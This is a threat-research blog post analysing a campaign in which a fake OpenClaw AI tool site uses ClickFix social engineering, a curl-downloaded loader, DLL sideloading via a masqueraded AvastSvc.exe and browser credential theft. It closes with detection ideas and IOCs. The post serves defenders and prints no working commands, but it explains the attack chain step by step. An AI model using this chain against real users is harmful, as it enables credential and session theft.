Fake OpenClaw AI Tool Used to Deliver Infostealer via ClickFix Attack Chain

\n\n BLOG APRIL 8, 2026 Threat Research FAKE OPENCLAW AI TOOL USED TO DELIVER INFOSTEALER VIA CLICKFIX ATTACK CHAIN IN THIS ARTICLE Overview Initial Access: ClickFix-Based Social Engineering Execution Chain Execution Analysis: Process Tree Defense Evasion: DLL Sideloading and Masquerading System Profiling Payload Execution: Malicious DLL (aswCmnOS.dll) Targeted Data Collection: Browser Credential Theft Command and Control (C2) Communication MITRE ATT&CK Mapping Detection Opportunities Process Behavior File System Indicators Defense Evasion Indicators Registry Activity Network Indicators Behavioral Indicators Indicators of Compromise (IOCs) Conclusion Overview This report analyzes a malware distribution campaign leveraging a spoofed OpenClaw platform to deliver an infostealer payload. The campaign relies on ClickFix-style social engineering to trick users into executing malicious commands manually, bypassing browser-based security controls. Once executed, the payload initiates a staged infection chain involving a loader, a masqueraded executable, and a malicious DLL deployed via sideloading. The final payload focuses on browser credential harvesting and data exfiltration over HTTPS using WinHTTP APIs, enabling stealthy communication with attacker-controlled infrastructure. Initial Access: ClickFix-Based Social Engineering The campaign uses a typosquatted domain designed to impersonate the legitimate OpenClaw platform. The website closely mimics the original branding and user interface to establish trust. ClickFix is a social engineering technique where users are instructed to manually execute commands, effectively bypassing browser-based download protections. Figure 1: Spoofed OpenClaw website (app-clawbot[.]org) impersonating the legitimate platform to lure users into initiating the infection chain. Instead of providing a standard installer, the site redirects users to a ClickFix-style interface that instructs them to manually execute a command via Command Prompt. Figure 2: ClickFix-style instructions prompting users to manually execute a malicious command, bypassing browser-based security controls. Execution Chain The infection chain is initiated when the user executes the provided command via Command Prompt. Execution occurs in the context of the logged-in user, with no evidence of privilege escalation observed during initial stages. The command performs the following actions: Downloads a payload using curl Writes the file into %AppData% Executes the payload immediately User → ClickFix → cmd.exe → curl → Loader → AvastSvc.exe → aswCmnOS.dll → Browser Data → C2 Following execution, the malware proceeds through a staged deployment: Initial binary executes as a loader Loader drops: AvastSvc.exe(masqueraded executable) Multiple DLLs, including aswCmnOS.dll The executable triggers DLL sideloading The malicious DLL is loaded and executed   Execution Analysis: Process Tree PROCESS TREE: REVEALING MALWARE EXECUTION FLOW Figure 4: Process tree illustrating staged execution, including loader activity and subsequent launch of a masqueraded executable. As shown above, the process tree highlights the transition from initial execution to payload activation, confirming a multi-stage infection model. The absence of a legitimate parent application chain and execution from user-writable directories further reinforces that the observed activity is malicious and not part of standard software installation behavior. Defense Evasion: DLL Sideloading and Masquerading The malware abuses DLL sideloading by bundling a legitimate-looking executable with a malicious DLL in the same directory. Figure 5: Dropped files demonstrating DLL sideloading, where a legitimate-looking executable loads a malicious DLL from the same directory. Due to Windows DLL search order behavior: The executable loads the malicious DLL from the local directory Execution occurs under the context of a trusted-looking binary Additionally, the use of the filename AvastSvc.exe mimics legitimate security software, further reducing suspicion. System Profiling Before executing its primary functionality, the malware performs basic host identification. It queries the following registry key: HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName Figure 6: Registry query used for system identification, retrieving the host computer name. This behavior supports: Victim identification Campaign tracking Environment awareness No advanced sandbox evasion techniques were observed in the analyzed sample. Payload Execution: Malicious DLL (aswCmnOS.dll) The file aswCmnOS.dll acts as the primary payload and is loaded via DLL sideloading. The DLL serves as the primary execution component, orchestrating credential harvesting and command-and-control communication: Initializing runtime components Loading or decrypting configuration data Executing credential harvesting routines Initiating communication with the command-and-control server This modular architecture enhances evasion by separating execution stages and reducing observable indicators per component. Static analysis of aswCmnOS.dll indicates that execution is initiated through standard DLL entry mechanisms, followed by initialization routines responsible for loading embedded configuration data. Observed API usage and string references suggest a staged execution model, where browser targeting and network communication components are initialized sequentially. Targeted Data Collection: Browser Credential Theft The malware includes logic to selectively target browser processes, ensuring focused data collection. Figure 7: Decompiled function used to identify browser processes, enabling selective credential harvesting. Based on this logic, the malware targets: Chromium-based browsers (Chrome, Edge) Mozilla Firefox Data of interest includes: Stored credentials (Login Data databases) Cookies and session tokens Browser profile data Selective execution minimizes noise and increases efficiency in credential harvesting. Data extraction likely targets SQLite-based browser storage files, including credential and cookie databases commonly used by Chromium-based browsers. Command and Control (C2) Communication The malware communicates with attacker-controlled infrastructure using WinHTTP APIs. Figure 8: Use of WinHTTP APIs for HTTPS-based communication with command-and-control infrastructure. Observed APIs include: WinHttpConnect WinHttpOpenRequest WinHttpSendRequest These are used for: Exfiltration of collected data Beaconing to maintain connectivity Potential tasking The use of HTTPS (port 443) ensures encrypted communication, reducing visibility in network monitoring systems. The use of WinHTTP enables the malware to blend with legitimate system traffic, reducing the likelihood of detection by security tools that rely on identifying anomalous networking libraries. MITRE ATT&CK Mapping The campaign aligns with the following techniques: T1204– User Execution T1036– Masquerading 002– DLL Sideloading T1005– Data from Local System 001– Web Protocols Mappings are limited to confirmed behaviors to maintain analytical accuracy. Detection Opportunities Process Behavior Process chain: cmd.exe → curl.exe → %AppData%\*.exe Suspicious parent-child relationships involving user-initiated command execution File System Indicators Executables and DLLs located in user directories Presence of: AvastSvc.exe outside expected installation paths Co-located DLLs used for sideloading Executables mimicking security software (e.g., AvastSvc.exe) outside standard installation directories Defense Evasion Indicators Unsigned DLLs loaded by legitimate-looking executables Execution from non-standard directories Registry Activity Queries to system identification keys such as ComputerName Network Indicators WinHTTP-based outbound connections using default Windows networking behavior Connections to newly registered or low-reputation domains Behavioral Indicators Access to browser credential stores Cookie and session token extraction Indicators of Compromise (IOCs) Domain app-clawbot[.]org File Names AvastSvc.exe aswCmnOS.dll File Path %AppData%\ Conclusion This campaign demonstrates a structured and effective infection chain combining social engineering and execution evasion techniques. Key characteristics include: User-driven execution via ClickFix Staged payload deployment DLL sideloading for stealth Targeted browser credential harvesting Encrypted C2 communication using native Windows APIs The reliance on legitimate tools and user interaction reduces detection by traditional security controls, emphasizing the need for behavioral monitoring and endpoint visibility. This campaign highlights the growing effectiveness of user-driven execution techniques in bypassing traditional security controls. Contributors: Siva Prasad Boddu Pandurang Terkar Rudra Pratap